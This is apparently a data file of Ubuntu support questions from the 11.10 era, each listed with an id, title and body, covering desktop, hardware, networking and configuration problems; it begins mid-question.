45932 assassins and so on.. this is done in the terminal with commands like cut , grep , cat , etc.. update : here is the whole file : http : //paste2.org/p/1744102 to parse in that way . update2 : please forgive me if i do not accept an answer just yet . am waiting for the bounty option to appear since for me , stuff like this deserve a bounty . so i will add a bounty and give it to the correct answer or answers .
73321	ca n't start webcam for google video services	i 've got ubuntu 11.10 64 bit and have installed the google video chat plugin . however webcam does n't seem to work ( black screen -- no video at all ) . for cheese it works but shows really bad ( black and white kinda ) image . following some link i installed guvcview if i start it then image looks neat . any suggestions on how can it be fixed ? if it helps i 've tried the solution : $ sudo mv /opt/google/talkplugin/googletalkplugin /opt/google/talkplugin/googletalkplugin.old $ sudo gedit /opt/google/talkplugin/googletalkplugin and putting following lines in : # ! /bin/sh ld_preload=/usr/lib32/libv4l/v4l1compat.so /opt/google/talkplugin/googletalkplugin.old or # ! /bin/sh ld_preload=/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so /opt/google/talkplugin/googletalkplugin.old cause i 've both files . finally $ sudo chmod +x /opt/google/talkplugin/googletalkplugin.old i closed and reopened chrome then started gmail tried video call -- black screen : -/ ok so today finally google+ provided me with trouble shoot link and advised me : the plug-in wo n't install if you 're having trouble installing the plug-in , or are receiving a message asking you to reinstall it , you should check to make sure your configuration is right . to do so simply : check to make sure the google talk plugin video accelerator and google talk npapi plugin are enabled . if you 're using chrome you can type about : plugins in your browser to display your plug-ins . make sure you 're not using internet explorer 64-bit ( this is a browser version that is 64 bit as opposed to 32 bit ) . ensure that you do n't have any `` click to run '' extensions enabled . if you 're still experiencing this issue after checking your configuration you can follow these steps : refresh the browser page . close any running google talk plug-in processes . close all open and running browser processes . restart your computer . uninstall and then reinstall the plug-in . try a different browser such as google chrome or mozilla firefox . i looked in about : plugins for chrome and firefox : i do n't have google talk npapi plugin , does that matter ? and i thought its installed with google talk plugin or no ?
73323	how to setup vsftpd for multiple users including adding specific directories	i wish to configure vsftpd in 11.10 so that when a user connects he is shown or redirected to a specific folder . the name of the folder is not related to the user or home folder . it is related to a folder in /var/www . for example : if user cyrex logs in ftp he is redirected to /var/www/gamers or at least shown a gamers folder inside his home folder that redirects to /var/gamers . if user camelot logs in ftp he is redirected to /var/www/food or at least shown a food folder inside his home folder that redirects to /var/food . ... the thing he should not leave his home folder and can only access folders inside his home folder that are redirected to other parts like the /var/www/folders . update : in one way of configuration the user should see his home folder and also a folder that redirects him to /var/www/userfolder . in another way of configuring vsftpd the user should just be redirected to /var/www/userfolder without even seeing his home folder , just the var/www specific to him . can both methods be shown in one answer so i can test both to see which one is better . what is the easier way to do this .
73328	how do i connect to a vpn in gnome-shell ?	i used to be able to choose `` connect to vpn '' from the network-indicator in ubuntu but since i 've upgraded to ubuntu 11.10 i 'm only using gnome-shell and i ca n't find anyway to connect to a vpn from this desktop environment . should n't it there be a similar button in gs 's network menu ? how do i do this from a graphical interface ?
73332	how to deactivate nvidia 9600m gt on a macbookpro 5,1/5,2/5,3	i have a macbookpro 5,1/5,2/5,3 that comes with two graphic cards , and by default i get the 9600m gt that consumes more battery that the other one . i have no idea how to deactivate it and activate the second one . more details after the bruno 's reply : i 'm using ubuntu : 11.10 64 bits with kernel 3.0.0-15-generic ( zegnus , mbp 5,1 ) 12.04 64 bits with kernel 3.2-0-24-generic ( megagolgoth , mbp 5,3 ) i have installed refit 0.14 , and grub2 efi64 i 've modified the entry on the file /boot/grub/grub.cfg adding outb 0x750 0 even though at the top of the file it says : do not edit this file it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub i save the file , boot , select the entry and then i have a black screen and nothing more happens . i 've tried https : //help.ubuntu.com/community/uefibooting # selecting_the_graphic_card too , with the same result . thank you .
73335	should i do 32 bit or 64 bit	i have a laptop with intel core i3 processor and 4 gigs of ram and intel r graphics . should i do a 32 or 64 bit install of 11.10 , because right now i have 32 bit and it 's a little slow , but im not too sure about 64 bit ubuntu .
73341	how do i fix lagging windows and remove a graphics card watermark ?	so i got some problems with ubuntu on my acer aspire 7750g i5 radeon hd 6650m 4gb ram 64bit installed ubuntu 11.10 64bit so my first problem is window dragging ; if i drag mozilla or any other windows it gets laggy and the cursor is behind my seccond problem is how to remove the hardware is not supported watermark after installing the graphic card drivers thx for yor help
73345	how to fix my mbr ? while installing random ubuntu my mbr is not getting overwritten anymore	i boot with liveusb . but how do i fix now my mbr , so that i can re-install ubuntu ? ( after installing ubuntu i get mostly this blinking cursor and black screen ) root @ ubuntu : ~ # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000638ad device boot start end blocks id system /dev/sda1 1 59769 480092160 83 linux /dev/sda2 59769 60802 8291329 5 extended /dev/sda5 59769 60802 8291328 82 linux swap / solaris disk /dev/sdb : 2013 mb , 2013265920 bytes 58 heads , 58 sectors/track , 1168 cylinders units = cylinders of 3364 * 512 = 1722368 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1965c912 device boot start end blocks id system /dev/sdb1 * 1 1169 1965056 83 linux root @ ubuntu : ~ # fdisk /dev/sda warning : dos-compatible mode is deprecated . it 's strongly recommended to switch off the mode ( command 'c ' ) and change display units to sectors ( command 'u ' ) . command ( m for help ) : p disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000638ad device boot start end blocks id system /dev/sda1 1 59769 480092160 83 linux /dev/sda2 59769 60802 8291329 5 extended /dev/sda5 59769 60802 8291328 82 linux swap / solaris command ( m for help ) :
73346	trouble with 11.10 looking to do a fresh reinstall wondering about losing programs	so i did a fresh install of ubuntu 11.10 64 bit on my new computer that is running windows 7 as well . i have ubuntu /root install on sda1 /home on sda2 /swap on sda3 and win 7 on sda4 . but now my computer is having problems like not being able to install software or the fglrx drivers . ubuntu software center tries to fix it , but runs into errors . i think all the trouble started when i tried to install samba4 and it did n't work . so here 's the question , i have a lot of software installed on my computer like inkscape , aptana 3 , netbeans , gimp , and bunches of school documents . i would like to be able to do a fresh install without losing all those programs . question : where are programs installed when you install them from the software center ? ? ? if it 's in /home , perfect i backed it up to a flash drive . if not where ? ? ? if anyone thinks they can help me fix these issues , samba4 not installing , ati fglrx drivers not working , not being able to install software via the software center etc . i 'd love to hear your thoughts ! i 'm not a complete newbee at linux but i 'm not an expert either - yes i do use bash = ) thanks for your help ! -caleb mellas
73347	how can i disable gnome-shell 's notification area ?	i want to disable the notification area in gnome-shell because it causes alot of graphical glitches for my computer . i use tint2 for my system tray . is there a way to do this ?
73348	ca n't use custom themes , gnome shell 3.2	i ca n't manage to get gnome tweak tool to allow me to switch themes , nor to install the required extensions and have them working . could anyone please give me any pointers ? edit : fixed it , but i forgot how i did it . sorry .
73350	how do i disable `` show_desktop '' ?	in order to have a different wallpaper on each work space in 11:04 , i needed select my wallpapers in compiz , then disable `` show_desktop '' using gconf-editor . in 11:10 , this option is not available . is there any work around ?
73354	replacing fedora 15 with ubuntu 11.10	i am new to the linux world and have been experimenting with a windows 7/ fedora 15 dual boot system , and now i would like to remove fedora and install ubuntu 11 instead . can anyone tell me the steps required for installing ubuntu over fedora the and what possible traps there are to watch out for ( i tried this once and nearly lost everything ) . any help would be appreciated . thanks for the replies , i have been looking into this a little with regard to my partitions . my hard drive has the usual windows 7 partitions at the begining of the disk , then i have an extended partition listed as /dev/sda4/ `` extended partition ( 0x05 ) '' at the end of the drive . this sda4 partion seems to be then sub divied into teo further partitions sda5 and sda6 . sda5 is a 500mb ext4 linux partition mounted as /boot , which i 'm guessing houses the grub boot manager for fedora . sda6 is the linux lvm partition which is itself subdivied into yet more partitions containing the swap space and the /home space . my questions is : for installing ubuntu do i simply select to install over the entire sda4 partition which i assume will over-write the boot partition or install ubuntu into sda6 and just overwrite fedora . i briefly tried to install ubuntu over sda4 and although the install process claimed to have complteted no boot loader system was installed , which meant no windows and no ubuntu . re-installing fedora from usb drive re-installed the boot system and allowed me to get back to windows . should ubuntu have automatically installed a grub boot loader ? thanks wisty
73357	how do i install the driver for a microsoft lifecam vx-3000 ?	i have looked all over ask ubuntu and ca n't find any way to install the driver easily . i will be fine by doing it through terminal if that is how to do it .
73363	setting kernelmodule-options permanently ? ( fix touchpad scrolling error )	i was looking for a solution here and the answers were only to open the 'system settings ' and to change the settings there . this was no help for me but then i found this : touchpad not working on dell xps l501x i followed the instructions and reloading the kernelmodule with that specific option helped me out ( i run oneiric on a sony vpceb1s1e ) . now the question : how to set his option permanently ?
73365	shutdown/suspend/hibernate not working correctly	i 'm using ubuntu 11.10 and every thing was good until few days i try to shutdown my laptop but instead ubuntu goes to the lightgdm login screen . also suspend and hibernate do n't complete : in suspend case i have to restart my laptop and in hibernate i have to power off it using the power button .
73367	what is cups server and how to share a printer ( locally or over a network )	the title tells you all , except that it 's about sharing printers . how do i connect to a shared printer on the network through cups or terminal ?
73369	disabling the guest account and session selection in lightdm	is there a way to disable a guest account in ( x , k , u , l ) buntu 's lightdm ? also - is there a way to disable session selection in lightdm ? it would be convenient if it always logged in to an xubuntu session and not gnome or xfce .
73374	where is `` applications > system tools > file types editor '' in 10.10 ?	i was following this link to set up for opening internet explorer .url files . but i can not find `` applications > system tools > file types editor '' in 10.10 . so i wonder how to do this equivalently in 10.10 ? or do you have some better way to set up for opening .url files ? thanks and regards !
73375	how do i put /home in a different partition ?	yeah , so i have 2 hard drives , on with 2 partitions ( backups and windows ) , and i have another that also has 2 partitions with only one used . i have ubuntu on hard drive 2 : partition one , but i have come to a point when the /home folder ca n't hold any more files , but the partition is only about 15 % filled up . so i did some researching and figured out that you can put it on a separate partition , but most of the guides were vague on what i needed to do . could someone give me step-by-step instructions on what i need to do , or even tell me a , easier or different way to fix this /home folder capacity problem ?
73376	gnome-shell , how to fix it ?	my gnome-shell display screen is tilted/ skewed , how do i fix it ? sometimes the screen flashes , how do i fix it ? i 've installed the ati catalyst 11.9
73383	why is my boot time slower after upgrade ?	my ubuntu 11.10 boots very slowly after i do a clean install into my desktop hp pavilion with the following specs : intel core i5-750 4gb of ram nvidia geforce gf315 . how can i fix this ? i compared its speed to ubuntu 11.04 , which i used before . 11.04 boots faster when starting up and shutting down .
73391	battery time to empty incorrectly estimated	my laptop battery is getting a old but it still gives me approx one hour [ 1â˝ hours on windows ] . the problem is that when i disconnect the power cord [ or log on without the power cord ] , the estimated time to empty shows only 2 minutes and the laptop goes into suspend . after a while the estimates gets more accurate . is there any fix available ?
73394	is the update server down ?	i ca n't update my ubuntu oneiric . when i run sudo apt-get update i get a `` ca n't connect '' message ... thanks .
73396	how to get espeak working ?	i 'm trying read it loud feature of acrobat , so need a text synthesizer , i 've installed espeak and libgnome-speech libraries ( it did n't work for acrobat right out of the box ) so when i started espeak-gui through command line it gave me segmentation fault next i tried only espeak and here is output : alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1613 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1613 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1613 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1613 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started any ideas ? or any alternative solutions for read it loud ? thanks
73398	how can i install the huawei e1550 dongle	i 'm a new user and ca n't have my huawei e1550 dongle installed & connect to the internet . can anyone help ? using ubuntu 11.10
73404	how do i get firmware for broadcom 4306 ?	it reads that i have broadcom 4306 but firmware is missing .
73405	how can i make deja dup use aes 256 as the encryption algorithm ?	i 'm using deja dup on oneiric ocelot . how can i make it use aes 256 as the algorithm for encryption ? or for that matter , how can i control which encryption algorithm is used ? deja dup uses duplicity which in turn uses gnupg . gnupg uses cast5 by default , but it also supports aes-256 . however , i have no idea what parameters deja dup passes to duplicity and what parameters duplicity passes to gnupg . so ... how can i control which algorithm is used ?
73410	can i uninstall totem ?	in my opinion , vlc is a much better and much faster player than totem , and plays everything without having to need all of the extra junk totem comes with . my question is , can you safely uninstall totem ? i 'm trying to reduce the amount of junk on my computer , and since i 'm using vlc for all my movie/video objectives , i see no need to have totem . thanks
73416	kernel xconfig for cross-compilation fails with `` no package 'qt-mt ' found error ''	i am cross-compiling a kernel.org linux kernel ( linux-3.0.4 ) for an embedded arm system . a few days ago , i was able to successfully build the kernel xconfig on an ubuntu 11.04 natty ( 64-bit ) host desktop using gcc and a cross-compiler . i 've also tried the same compilation process on an ubuntu 11.10 ( 64-bit ) desktop . however , i now receive the following errors related to package 'qt-mt ' : $ make arch=arm xconfig package qt-mt was not found in the pkg-config search path . perhaps you should add the directory containing `qt-mt.pc' to the pkg_config_path environment variable no package 'qt-mt ' found package qt-mt was not found in the pkg-config search path . perhaps you should add the directory containing `qt-mt.pc' to the pkg_config_path environment variable no package 'qt-mt ' found package qt-mt was not found in the pkg-config search path . perhaps you should add the directory containing `qt-mt.pc' to the pkg_config_path environment variable no package 'qt-mt ' found package qt-mt was not found in the pkg-config search path . perhaps you should add the directory containing `qt-mt.pc' to the pkg_config_path environment variable no package 'qt-mt ' found hostcxx scripts/kconfig/qconf.o scripts/kconfig/qconf.cc:6:21 : fatal error : qglobal.h : no such file or directory compilation terminated . make [ 1 ] : *** [ scripts/kconfig/qconf.o ] error 1 make : *** [ xconfig ] error 2 the xconfig is being run on the host ubuntu desktop to prepare the kernel options for a cross-compiled kernel image . since the xconfig is run on the host , it is not being built with the cross-compiler . i have no clue what is happening here , but i think it might be related to where the qt libraries are installed on ubuntu . i 've found the following thread on the fedora forum , but i do n't know if it applies to my situation on ubuntu . http : //forums.fedoraforum.org/showthread.php ? t=139653 i 've also tried to uninstall and reinstall qt3 and qt4 using the apt tools , but the error given above still persists . any suggestions on what i could do to successfully compile xconfig ?
73417	how do i use a dv camcorder as a webcam ?	i have a dv camcorder that works with webcamstudio , but i do n't know how to get it to work as a the default webcam .
73426	multiple monitors dual amd gpu not working ?	i installed 11.10 and finally have two of my monitors working . i have a dual radeon hd 6950 setup with the two working monitors in the first card and the third in the second . it worked fine in windows however i ca n't get it to detect the third monitor . catalyst does show and unknown monitor but i have no clue how to enable it from this state . all help would be appreciated . i am trying to get setup for physics research .
73427	`` can not fork '' error messages	this happens with many different programs from the terminal . usually accompanied with some error message about not being able to allocate memory . when i try `` free -m '' this is the output : martin @ martin-thinkpad-t410 : ~ $ free -m total used free shared buffers cached mem : 3823 3079 744 0 99 1159 -/+ buffers/cache : 1820 2003 swap : 3953 60 3893 why is my swap usage so low ? is this related ?
73429	does tomboy break unity / compiz ?	i tested it with a ubuntu 11.10 live cd x64 and a fresh install on my hdd : after starting tomboy i can not logout / shutdown / restart anymore . the menu bar / launcher disappears after initiating the logout but the desktop background wo n't disappear . windows remain open but do loose their window decorations ... tested with unity 2d / 3d . running ubuntu on a toshiba p835 with intel hd 3000 , so it would be great if somebody could confirm this , before i can post this to launchpad . edit : since it was confirmed i opened a bug on launchpad : bug # 883370 . please vote to get this fixed soon ! edit2 : there are bugs already related to my problem at bugzilla https : //bugzilla.gnome.org/show_bug.cgi ? id=650029 and launchpad https : //bugs.launchpad.net/ubuntu/+source/tomboy/+bug/880299 closed .
73431	when ubuntu server restarts eth0 does n't come back up	every time i restart my ubuntu server 11.10 i ca n't ssh into it because eth0 does n't come up automatically . i never had this problem before upgrading to 11.10 . i have to login to the server and start the eth0 manually . i would appreciate it any help . thanks . here is my /etc/network/interfaces file : # the loopback network interface auto lo eth0 iface lo inet loopback # the primary network interface iface eth0 inet static address 192.168.1.102 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 gateway 192.168.1.1
73434	how do i get a canon mf4150 printer working ?	as i am enjoying my new ubuntu 11.10 os ( and impressed with it ) i ran into some difficulties getting my canon mf4150 printer to work . the printer seems to be installed properly ( followed this post ) however when i try to print something i get this error : printer-state-message= '' /usr/lib/cups/filter/pstoufr2cpca failed '' i think i 've come across the solution but i do n't know how to apply it to my version of ubuntu . any ideas ?
73435	pam_mount wo n't automount encrypted partiton	as usual , when i install a new version of ubuntu i install pam_mount to automount my with luks encrypted partition on login . however , for ubuntu 11.10 , i followed the same procedure as usual , but i ca n't make it work . the encrypted partition is /dev/sda5 and i added the information < volume user= '' user '' fstype= '' crypt '' path= '' /dev/sda5 '' mountpoint= '' /media/personal '' options= '' fsck , relatime '' / > to /etc/security/pam_mount.conf.xml . the partition does show up in nautilus but is not mounted . any idea ? edit : there are no error messages or other information in the terminal , pointing to a false password or configuration error .
73438	how to partition a advanced disk hdd properly using gparted or similar	i have one of these fancy hard drives that use the `` revolutionary '' advanced disk format . i partitioned my hdd for ubuntu 11.10 from scratch and checked with ubuntu 's disk utility for errors . however , after installation of ubuntu 11.10 , i have a warning in the disk utility saying about one partition the partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested . i pretty much understand the cause of the issue since there are many posts here about this error message , but how exactly do i partition my harddrive properly to avoid these kind of misalignment errors ? i got rid of the misalignment warning by booting ubuntu from a live cd . i reduced the preceding partition by one 1 mb and resized the misaligned one by one megabyte with the option `` align to mb '' .
73440	how to maximize dash using keyboard shortcut ?	are there any keyboard shortcut to maximize dash ?
73442	how do i login in single user mode ?	i needed to login through a single user mode in ubuntu 11.10 but do n't know the changes i 've to make in the grub command .
73443	how to stop the terminal from wrapping lines	is there a way to tell the terminal not to wrap long lines . i wish to see a line in the same space without wrapping to the next one . i do not care if i can not see the end of the line just as long as the line stays in one . a horizontal scroll would be good for this also but for the moment the removal of the wrapping is what i need .
73444	how to show line numbering in nano when opening a file	is there a way to tell nano to automatically show line numbering each time i open a file .
73446	canon mp630 m/f printer wont print correctly	in ubuntu 11.10 , the mp630 seems to install correctly but when printing , it prints double height characters with blank lines through them , on a very simple text ( e.g . in gedit ) . it also does crazy line feeds and scatters characters over the page . i have tried using the .deb files that i have used previously and successfully in a number of previous distributions of ubuntu but i keep getting dependency issues with libcupsys2 and libcups2 . i have tried changing the dependencies in cnijfilter-common_3.00-1_i386.deb.org and cnijfilter-mp630series_3.00-1_i386.deb . running libcupsys2_1.3.9-17ubuntu3.1_all.deb but then indicates that i 'll break the libcups2 package . i get the error message : breaks existing package 'libcups2 ' conflict : libcupsys2 ( ) as i consider myself as still in the learning stage please advise of anything i may have overlooked .
73451	how do i get perfmon support for my kernel ?	i would like to install perfmon for using performance monitoring events on my ubuntu 10.04 lts server machine . i have read that ubuntu kernel 2.6 comes with perfmon support . however , as we can see below , it looks like kernel2.6.32 does n't have perfmon support . could someone tell me how can get perfmon support . however , i have installed papi library and able to run all the tests successfully . $ pfmon host kernel does not have perfmon support $ uname -a linux ubuntu-user 2.6.32-34-server # 77-ubuntu smp tue sep 13 20:54:38 utc 2011 x86_64 gnu/linux
73453	is there a problem connecting to archive.ubuntu.com ?	i was able to use software center until 2 days ago , but i ca n't use it for two days . i also tried downloading software using terminal , but it gives a connection error saying to check internet connectins . but i have no problem with my internet connection . does anyone know something about this ?
73458	screen going to sleep while program still running in 11.10 32bit	i have screen saver as well . but with 11.10 the screen goes black/blank while banshee is playing ( full screen now playing mode ) and while watching movies in vlc . i did not have this issue in any prior ubuntu releases . how can i stop my screen from blanking out while watching movies or running banshee in now playing full screen mode ? thank you for your time and answers
73463	computer hibernates when unplugged from powersource	my msi notebook shuts down everytime i unplug it from the power supply . even when the battery is full , this is quite annoying . anyone seen this before or have a fix for it ?
73467	how do i create a new logical partition from unallocated space ?	i bought a new hard drive and installed windows followed by ubuntu 11.04 on it . in the screenshot below , windows system , c : , swap are primary partitions . i then put / and /home in an extended partition . i left about 150gb , which is highlighted , because i wanted to make it a d : later . windows will not let me format that volume , since i have already have 4 partitions . ubuntu disk utility is not recognizing it and i can not create a partition from that allocated space either . is it possible to take that unallocated space , and put it under the `` extended partition '' without extending any existing partitions ? my aim is to have a partition formatted in ntfs/fat32 that both ubuntu and windows can use . i will reformat and reinstall if required but would like to know if there is a quicker way first .
73471	ubuntu one only downloads filenames	i have installed ubuntu one on two android devices and two different laptops ( running 10.x and now 11.1 ) . after playing with it a bit , i have concluded that either : i am missing something , or i have unreasonable expectations ( perhaps influenced by prior use of dropbox ) . here is my experience in a nutshell : photos taken by the android devices upload to the cloud , no problem those photos then download to the laptops , no problem files marked for sync on the laptops upload to the cloud , no problem but , none of those files download to the android device until i try to open it . is n't the whole point that the files will magically appear on my mobile so they are all sync 'd up and ready when i want them ? the only solution i have found so far if to physically touch each file to initiate the sync , which is far less convenient than just using an sd card .
73472	how to create a url link on the unity desktop	how do i create a url link on the desktop ? on lucid one could create a url by right clicking the desktop anywhere and a menu would appear that allowed the creation of a launchpad location ( a url ) and once created when clicked it would launch the desired web location . how is this accomplished in oneiric ocelot ?
73473	how to bind custom commands to keyboard shortcuts ?	i have arrived at 11.10 , installed gnome-shell and wondered where i can bind my custom commands to keyboard shortcuts . in compiz i used the simple and efficient `` commands '' plugin . how to do that in gnome-shell ?
73474	how to install firefox addon from command line in scripts ?	i want to improve my unattended script adding some firefox addon , however i cant find the way , can someone help to find out how to ? example : ( want to install adblockplus plugin and set a new default webpage ) wget https : //addons.mozilla.org/firefox/downloads/latest/1865/addon-1865-latest.xpi firefox -silent -install-global-extension addon-1865-latest.xpi -setdefaultbrowser www.google.es thanks in advance .
73482	problem with gnome3-shell ( top taskbar )	i install gnome-shell and zukitwo-theme . the upper taskbar it is transparent but behind is a bar how can get rid off it . do i need this bar ? see the image ! !
73483	why am i asked for default 's keyring at startup ?	i 'm prompted for default 's keyring at every boot since 11.10 upgrade , even though i do n't see any application i have needing at startup ( i have no wifi , and disabled gwibber-service ) how can i know which application is requesting it ? how can i disable it ? i ca n't even move any window until i enter the password , and sometimes entering the password even crashes x ( bug reported here : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-evdev/+bug/882955 )
73487	public key authentication unsupported by web host . method to avoid entering password ?	unfortunately , my web hosting plan does not allow public key authentication . apparently , this method is available to vps and dedicated server customers only . i 've backed up my ubuntu 11.10 machine using deja-dup and i 'm sending the backed up files to my web host using rsync . i would like to automate this process using a script , but as i am not able to use public key authentication , i am forced to manually copy and paste my ( strong ) ssh password each time to start the process . is there a way round this ? if so , how ?
73489	how to make your college to use ubuntu ?	well i have been using ubuntu for past one year . even though i 'm not yet experienced with all the commands that ubuntu provides , i like ubuntu . in my college they use windows . in such a situation how do i explain my teachers/hod/principal that ubuntu is as powerful as windows ? i know i have said this : its a open source . no virus.. all softwares can be installed easily we can use wine to run .exe applications . apart from these what all strong points can be given to change my college to windows to ubuntu ?
73491	no such file or directory for existing executable	i just upgrade to ubuntu 11.10 x64 from ubuntu 11.04 32bit . but i find a really annoying problem . when i drag executable from file explorer to shell , the shell says bash : /home/fenfei/app/android-sdk-linux/platform-tools/adb : no such file or directory it 's jus over there . i also have problem executing ... /java . so i delete java , and extract the java package again then execute it and it works . but for /home/fenfei/app/android-sdk-linux/platform-tools/adb that method does n't work . all of them are marked as executable . anyone can help me ?
73493	why does ubuntu hangs and looks 1995ish before logout ?	since 11.10 upgrade , logging out takes a while ( it used to be much faster on the same computer ) i ca n't determine what 's causing this , but for a few moments at logout , my system seems to `` freeze '' , the opened windows switch to an ugly theme before it can complete the logout . what 's causing this ? can i prevent it and thus fasten up shutdown/logout ?
73494	is my vm using kvm or qemu ?	after installing ubuntu 11.10 and copying my kvm images which were created on ubuntu 11.04 over to the new system , i notice that virt-manager says it 's using qemu and not kvm . also when running virsh version it says running hypervisor : qemu 0.14.1 . however , when i run kvm-ok it says info : /dev/kvm exists and kvm acceleration can be used . also , the xml file of my vm clearly states it should use kvm : < domain type='kvm ' > < emulator > /usr/bin/kvm < /emulator > . furthermore , lsmod |grep kvm shows the following ( when the vm is running ) : kvm_intel 61643 3 kvm 383822 1 kvm_intel so how do i know if kvm or qemu is being used ? and why am i getting such contradictory output of these different commands ?
73499	is gloobus coverflow still available ?	i know that there are new ways of previewing files and folders a la gnome sushi but i used to have a certain eye candy -gloobus coverflow- which was available in nautilus elementary . is it possible to enable coverflow in 11.10
73500	if i install ubuntu on my external hard drive , will my data be deleted ?	i have an external harddrive that i use to backup my files . but now i want to install ubuntu on it . i was thinking of a liveusb instalation , because it would allow me to boot ubuntu from other computers . the problem is , i have alot of data on the hard drive and i want to be able to acces that data from windows ( when booted into windows and than connect my hdd to my pc ) and from ubuntu . and is it possible to remove the liveusb instalation without lozing my data ? ( i have installed ubuntu on my old usb a couple of times and i know i am capable to mes it up without knowing .
73502	how to map the 'menu key ' as 'altgr key ' ?	i , m on a dell mini 910 with english keyboard and ubuntu 11.10 also in english , and i want to keep it this way . but most of my typing is in spanish so i need the altgr key to get spanish characters with out switching my keybosrd layout . also by changing my keyboard laytout to spanish i can certaing characters in this small keyboard . do you know how to map the 'menu key ' as a 'altgr , ? thanks .
73506	using hamster in gnome shell 3.2	i am running gnome shell 3.2 on ubuntu 11.10 . i have installed hamster applet package version 2.32.1-0ubuntu5 . there is now a time tracker application . clicking on it does start the application where i can enter data , etc . but there is no indicator either in the top bar or at the bottom notification area . there are no periodical reminders . is there something missing ? how do i get the features it had with gnome 2.3 thanks in advance .
73507	unable to find wireless networks ?	after loading ubuntu 11.10 of the internet on a dual boot option alongside windows xp . it can not find the wireless networks within range when the modem is within a meter of it . when i click the wireless button in the top right hand corner the list shows wired network wired connection 1 disconnect vpn connections enable networking connection information edit connections ... after doing a test unconnected to the wired internet i could open http : //192.0.43.8/ , but not http : //www.iana.org/ - this suggests there is a `` dns '' issue - i 've got no idea what this is or how to fix it .
73510	how to configure pyqt4 for python 3 eclipse in ubuntu ?	i installed pyqt4 with synaptic . i 'm using python3 so i need to configure the path for pyqt4 in eclipse , but it seems synaptic only installed pyqt4 for python 2 since i only found relative files and folders under python 2.6 and 2.7 . so how can i make pyqt4 to work with python 3 and eclipse ? thanks . updateďź i tried to configure it following this post : http : //ubuntuforums.org/showthread.php ? p=10914908 # post10914908 but after following all the instructions without any error occurs in the way , i get error from running this code in python 3.2 : > > > import pyqt4 the error message is : traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named pyqt4 but the strange thing is that the same code results no error in python 2.7 ( i have both 2.7 and 3.2 installed on my machine )
73513	unity session fails to open	while looking out to solve another problem , i 've disturbed the opening of unity session by altering ( suppresssing ) gconf ( as suggested somewhere between , ubuntu doc , forums and ask ubuntu ) - now unity opens on my wallpaper , with a top command bar but without panel or launcher , and with mouse arrow replaced by a ( linux ) cross ; when i open a terminal , it opens on the desktop directory , and i have to run a unity -- replace command to get unity fully up and running . there must be a small piece of code somewhere that provokes this mess , but i have no idea about where to look or what to look for .
73516	alt+f2 stopped working in gnome shell	i just noticed that my alt+f2 no longer works in gnome shell on ubuntu 11.10 . it was working fine just last week . how can i fix this ?
73522	repairing 11.10 / downgrading to 10.04 on a dualboot	i used 10.04 for a while and loved it . got a new laptop and installed 11.10 as a dualboot with the pre-installed windows 7 ( for skype and spotify . kill me. ) . i did n't like unity , tried loading gnome , and somehow things went very very wrong . if i load 11.10 normally it loads with the broken/unusable gnome interface , but somehow it loads fine through the recovery mode . i 'd be happy to 'reset ' the installation , install it a-new , or simply get back to 10.04 . attempting to install 10.04 did n't work ( it would n't boot for some reason ) , and loading the 11.10 installer wo n't solve it ( the best it would let me do is wipe windows7 and install 11.10 on everything ) any solutions ? thanks !
73523	wireless internet connection so slow after upgrade to 11.10	after upgrading my ubuntu to 11.10 , my internet connexion became so slow or it goes away for a couple of seconds . it is a wireless connection , i have a dell studio 1525 and i have not install any additional driver i know that it is a general question , but i really have not any more information . thanks
73524	how do i keep stored passwords from ubuntu 10.04 ?	i want to re-install the pc my mother uses and since she 's not very handy with computers , she has a bunch of passwords stored in firefox which she probably forgot and wo n't be able to enter again . the current system is ubuntu 10.04 . i want to install lubuntu 11.10 . how do i ensure that after re-installing the system , all her stored passwords will remain stored and pre-filled in all the websites she currently uses ? also , i 'd like to install google chrome instead of firefox , so they should be available in google chrome .
73525	sugarsync cloud - magic briefcase folder location	i 'm using sugarsync on my windows and ubuntu . sugarsync does n't have a native linux client , so i installed windows version via wine . if someone uses it in that way - where a hell is `` magic briefcase '' folder ? i looked in home/.wine/ ... and found something , but sugarsync do n't recognize any changes . maybe the client do n't work via wine , or i ca n't find what i looking for ? thanks .
73526	why ca n't i access localhost without an internet connection ?	for some reason i can not access localhost without an internet connection in ubuntu . as soon as i disconnect from the internet ( with the networkmanager gui ) , both ping localhost and ping 127.0.0.1 return : ping : sendmsg : operation not permitted i switched off iptables , iptables -l gives : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination what could be the problem ?
